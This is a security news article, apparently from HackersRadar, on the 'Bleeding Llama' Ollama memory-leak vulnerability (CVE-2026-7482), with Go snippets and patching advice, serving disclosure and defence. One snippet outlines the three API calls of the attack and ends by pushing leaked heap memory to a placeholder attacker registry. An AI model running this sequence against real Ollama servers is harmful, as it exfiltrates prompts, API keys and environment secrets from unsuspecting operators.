Critical Ollama Memory Leak Exposes 300,000 Vulnerable Servers
A newly disclosed security flaw in Ollama, a platform widely used to run AI models locally, places one of the most prominent tools in the local AI landscape at risk of a high-profile exposure event.
The issue, dubbed “Bleeding Llama,” allows unauthenticated attackers to access the Ollama process and extract sensitive data directly from memory, putting roughly 300,000 internet-facing servers worldwide at risk.
With only three API calls, an attacker can extract prompts, system instructions, and environment variables from exposed deployments, turning AI infrastructure into an unexpected source of data leakage.
Discovered by cybersecurity researchers at Cyera and assigned a critical CVSS score of 9.1 by the Echo CVE Numbering Authority, CVE-2026-7482 poses a serious risk to enterprise deployments.

Ollama lets users create model instances from uploaded files, including GGUF model files used to package tensors, metadata, and other model information for local inference.
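For readers unfamiliar with the format, the sketch below models the GGUF tensor-descriptor fields that matter for this bug, following the public GGUF specification. The field names and helper function are illustrative, not taken from Ollama's parser.

```go
package main

import "fmt"

// ggufTensorInfo models the per-tensor metadata a GGUF file declares,
// per the public GGUF spec; field names here are illustrative.
type ggufTensorInfo struct {
	Name   string   // length-prefixed tensor name
	Dims   []uint64 // declared shape, fully attacker-controlled
	Type   uint32   // ggml element type (e.g. F16)
	Offset uint64   // position of the tensor data in the data section
}

// declaredByteSize is what a naive reader trusts: it is derived entirely
// from metadata, never from how many bytes the file actually contains.
func declaredByteSize(t ggufTensorInfo, elemSize uint64) uint64 {
	n := elemSize
	for _, d := range t.Dims {
		n *= d
	}
	return n
}

func main() {
	t := ggufTensorInfo{Name: "blk.0.attn_q.weight", Dims: []uint64{1 << 20, 64}, Type: 1}
	// Claims 128 MiB of F16 data regardless of the file's real length.
	fmt.Println(declaredByteSize(t, 2), "bytes declared")
}
```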
Ollama Vulnerability Exposes Servers
The vulnerable path is tied to the model-creation flow, where Ollama processes uploaded files via its API and prepares them for conversion and saving.
Researchers found that a crafted GGUF file can abuse this process by declaring a tensor shape that is much larger than the actual data stored in the file, causing the server to read beyond the intended buffer.
The weakness appears during tensor conversion, where Ollama drops into Go's unsafe package for low-level memory operations, stepping outside the language's usual memory-safety guarantees.
Because the software does not validate that the tensor metadata is consistent with the actual file size, the conversion routine can read past the end of the buffer and capture unrelated heap contents sitting beside it.
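In Go terms, the bug class looks roughly like the sketch below. This is a condensed illustration of the pattern, not Ollama's actual source: a byte count derived from attacker-controlled metadata is handed to unsafe.Slice without first being checked against the bytes actually read from disk.

```go
package main

import (
	"fmt"
	"unsafe"
)

// readTensor returns a view over the tensor bytes. `declared` comes from
// the GGUF metadata; `data` is what the file actually contained.
func readTensor(data []byte, declared int) ([]byte, error) {
	// The missing check: metadata must agree with the real payload size.
	if declared > len(data) {
		return nil, fmt.Errorf("declared size %d exceeds payload %d", declared, len(data))
	}
	// Without the check above, this unsafe view would extend past `data`
	// into adjacent heap allocations: a silent out-of-bounds read.
	return unsafe.Slice(&data[0], declared), nil
}

func main() {
	data := make([]byte, 4) // 4 real bytes in the file
	if _, err := readTensor(data, 64); err != nil {
		fmt.Println("rejected:", err) // with validation, the file is refused
	}
}
```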

That leaked memory is then carried forward into a newly created model file instead of being discarded.
The attack becomes especially dangerous because researchers found a way to preserve the leaked memory in readable form during conversion.
By using a float-16 source tensor and forcing a float-32 destination, the attacker can rely on a lossless conversion path that preserves the stolen bytes rather than corrupting them through lossy quantization.
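That lossless-path claim is easy to sanity-check. The sketch below uses a generic binary16-to-binary32 widening routine, written for illustration rather than taken from Ollama, and verifies that all 65,536 half-precision bit patterns map to distinct float-32 bit patterns, so leaked bytes survive the conversion intact.

```go
package main

import "fmt"

// half2float widens one IEEE-754 binary16 bit pattern to binary32.
func half2float(h uint16) uint32 {
	sign := uint32(h>>15) << 31
	exp := uint32(h>>10) & 0x1F
	mant := uint32(h) & 0x3FF

	switch {
	case exp == 0 && mant == 0: // signed zero
		return sign
	case exp == 0: // subnormal: renormalize into the wider exponent range
		e := uint32(113) // 127 - 15 + 1
		for mant&0x400 == 0 {
			mant <<= 1
			e--
		}
		return sign | e<<23 | (mant&0x3FF)<<13
	case exp == 0x1F: // infinity and NaN; the NaN payload is kept intact
		return sign | 0x7F800000 | mant<<13
	default: // normal number: rebias the exponent, widen the mantissa
		return sign | (exp+112)<<23 | mant<<13
	}
}

func main() {
	seen := make(map[uint32]bool, 1<<16)
	for h := 0; h <= 0xFFFF; h++ {
		f := half2float(uint16(h))
		if seen[f] {
			fmt.Printf("collision at %#04x\n", h)
			return
		}
		seen[f] = true
	}
	fmt.Println("all 65,536 half patterns map to distinct float32 bits: the widening is lossless")
}
```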

Once the malicious model is created, Ollama’s push functionality can upload it to an attacker-controlled server, effectively exfiltrating the leaked memory from the target system.
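Taken together, that is the entire three-call sequence mentioned earlier. The sketch below outlines its shape against Ollama's documented REST endpoints (/api/blobs, /api/create, /api/push); the host names, model name, and digest are placeholders, responses and errors are ignored for brevity, and the exact request fields vary across Ollama versions.

```go
package main

import (
	"bytes"
	"net/http"
	"os"
	"strings"
)

func main() {
	target := "http://exposed-ollama.example:11434" // placeholder for an exposed instance

	// 1) Upload the crafted GGUF as a content-addressed blob.
	gguf, err := os.ReadFile("crafted.gguf")
	if err != nil {
		panic(err)
	}
	digest := "sha256:<hex-of-crafted.gguf>" // placeholder digest
	http.Post(target+"/api/blobs/"+digest, "application/octet-stream", bytes.NewReader(gguf))

	// 2) Create a model from that blob; the conversion step is where
	//    adjacent heap memory is copied into the new model's tensors.
	name := "attacker-registry.example/x/leaky" // registry-qualified placeholder name
	create := `{"model": "` + name + `", "files": {"crafted.gguf": "` + digest + `"}}`
	http.Post(target+"/api/create", "application/json", strings.NewReader(create))

	// 3) Push the poisoned model out, exfiltrating the captured bytes.
	push := `{"model": "` + name + `", "insecure": true}`
	http.Post(target+"/api/push", "application/json", strings.NewReader(push))
}
```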
According to the Cyera research, the leaked heap data can include user prompts, system prompts from other models, and environment variables stored by the host running Ollama.
In enterprise environments, this may expose API keys, internal instructions, proprietary code, customer-related content, and other highly sensitive material processed by AI workflows.
The risk grows further when Ollama is connected to external tools or coding assistants, because those outputs can also pass through memory and become part of what an attacker steals.
The issue affects Ollama deployments running versions earlier than 0.17.1, the release that includes the security fix referenced by the researchers and Echo.
Organizations should upgrade immediately, remove any public exposure, place Ollama behind authentication controls, and restrict access to trusted internal networks only.
Any environment that has been internet-accessible should also review logs, rotate secrets, and assume that prompts and environment data may already have been exposed.
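As a first triage step, a reachability-and-version probe can flag unpatched hosts. The sketch below assumes Ollama's standard /api/version endpoint; the hostname is a placeholder for your own deployment.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
)

func main() {
	// Placeholder host: substitute the Ollama instance you need to audit.
	resp, err := http.Get("http://ollama.internal.example:11434/api/version")
	if err != nil {
		fmt.Println("not reachable (good, if it is meant to be private):", err)
		return
	}
	defer resp.Body.Close()

	var v struct {
		Version string `json:"version"`
	}
	if err := json.NewDecoder(resp.Body).Decode(&v); err != nil {
		fmt.Println("unexpected response:", err)
		return
	}
	fmt.Printf("ollama version %s; anything below 0.17.1 needs the upgrade\n", v.Version)
}
```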
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.


